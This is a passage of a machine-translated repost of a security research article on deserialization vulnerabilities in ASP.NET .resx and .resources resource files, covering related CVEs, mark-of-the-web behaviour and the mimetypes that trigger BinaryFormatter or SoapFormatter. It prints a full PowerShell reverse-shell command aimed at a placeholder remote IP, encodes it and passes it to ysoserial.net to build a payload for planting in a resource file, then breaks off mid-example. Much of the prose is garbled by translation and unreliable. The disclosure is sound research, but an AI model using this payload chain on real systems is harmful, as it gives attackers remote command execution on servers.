For ASP. NET resource files. RESX and deserialization vulnerability research-exploit warning-the black bar safety net

ASP. NET application resource files are typically used as a localized storage, they can be used to store user interface elements or can be easily translated string to[1]. These resource files are generally used. resx as the file expansion name, and when they are in. resources as files to expand the name, can also be application is compiled to use. Available on Microsoft’s website to understand to the resource file for more information[2, 3]
These resource files although is in XML format, but they can still contain a serialized object. The binary object being serialized can be stored in a base64-encoded. resx file. Resource file support BinaryFormatter And the SoapFormatter and TypeConverters, these methods can be abused to deserialize enough to secure the object or load an external file
This article aims to discuss in more detail this attack vector attack vector, and to enhance the everyone of its cognitive depth, the present study confirm the problem of inspiration from AlvaroMuñoz and Oleksandr Mirosh written paper, Friday the 13th JSON Attacks8

The patch with the legacy questions
I as early as 2018 1 month to Microsoft to report the resource files. resx and. resources in some deserialization issues, but until 2018 7 on Microsoft in many products released several patches（CVE-2018-8172, CVE-2018-8172 and CVE-2018-8300, for example, before that SharePoint and Visual Studio have been in an unsafe manner processing resource file[7]
!
In the fight on 2018 7 on the patch after, has been unable in Visual Studio to directly open with the Web mark（MOTW）[8]. resx and. resources files. When the MOTW work, resgen. exe tool[9]will display the error, and winres. exe tool[10]It will always display a warning message. It is worth noting that from the zip package to unzip a file or from IE or Edge outside the browser to download the file May and is no MOTW, we should be more cautious to deal with them
Microsoft Developer Center MSDN）[11]of the System. Resources namespace document also have corresponding updates, including the ResourceManager And ResourceReader and ResourceSet method of the following safety instructions:
“Calling methods in this class with untrusted data is a security risk. Call the methods in the class only with trusted data. For more information, see Untrusted Data Security Risks”.
“Use of untrusted data to call the methods in this class there is a security risk. Use only trusted data to call this method. For more information, see untrusted data security risks
We should note that the System. Resources method behavior has not been changed, thus all the use of the ASP. NET Library to read, compile, or decompile the resource file of the application, for example[12]and[13], If the user accepts to provide the resource file, then it may be under attack

How to System. Resources namespace?
Because of the inability to determine in advance the resource file in the serialization object type, it is not through the investigation of unsafe deserialization this method to prevent malicious code execution. Although when using the BinaryFormatter when can protect to a certain method, but want to prevent all the attacks is simply unhelpful, because the SoapFormatter or TypeConverters can be used as an alternative method for bypass
Resource files may also be using a UNC path to a local file or a shared resource, and this in turn may lead to file enumeration or the SMB hash hijacking and other minor risks. When the client tool is used as the target, the SMB hash hijacker may face higher greater risk
Due to the. resx files are based on XML, and therefore in the use of common XML library to read the resource file when a custom parser may be vulnerable to XML external entity XXE attack it. However, by default, the ResXResourceReader class will not process the document type definition（DTD）this part of the XmlTextReader
Technical details
You can use the data of the mimetype attribute and metadata tags in a resource file within the deserialized object, in addition to the type property can also be used to deserialize using the TypeConverters object
By the BinaryFormatter and SoapFormatter deserialize
In the following case using the BinaryFormatter System. Runtime. Serialization. Formatters. Binary. BinaryFormatter the resource files of the object to deserialize to:
mimetype attribute to submit a null value to the data tag;or
mimetype attribute is data or meta-data tag:
application/x-microsoft. net. object. binary. base64
text/microsoft-urt/psuedoml-serialized/base64
text/microsoft-urt/binary-serialized/base64
In the following case using the SoapFormatter System. Runtime. Serialization. Formatters. Soap. SoapFormatter the resource files of the object to deserialize to:
mimetype attribute is data or meta-data tag:
application/x-microsoft. net. object. soap. base64
text/microsoft-urt/soap-serialized/base64
By[14]at the source code shows that the SoapFormatter and not through the System. The Web is used, however this can still through the resource file to upload to ASP.NET the Web application’s resource folder to perform
ysoserial. net project[15]may not know the deserialization problem situations, to generate a Payload attack load it. The following example shows how to generate a reverse PowerShell function Payload attack loads
$command = ‘$client = New-Object System. Net. Sockets. TCPClient(“remote_IP_here”, remote_PORT_here);$stream = $client. GetStream();[byte[]]$bytes= 0…65535|%{0};while(($i = $stream. Read($bytes, 0, $bytes. Length)) -ne 0){;$data = (New-Object-TypeName System. Text. ASCIIEncoding). GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback + “PS” + (pwd). Path + "> ";$sendbyte = ([text. encoding]::ASCII). GetBytes($sendback2);$stream. Write($sendbyte,0,$sendbyte. Length);$stream. The Flush ()}; for$client. Close()’
$bytes = [System. Text. Encoding]::Unicode. GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
./ ysoserial.exe -f BinaryFormatter-g TypeConfuseDelegate-o base64-c “powershell.exe -encodedCommand $encodedCommand”
Then as shown below, the resulting Payload attack the load for the resource file which
[Resource file with the default scheme and headers redacted]
data name=“test1_BinaryFormatter” mimetype=“application/x-microsoft. net. object. binary. base64”>

[1] [2] next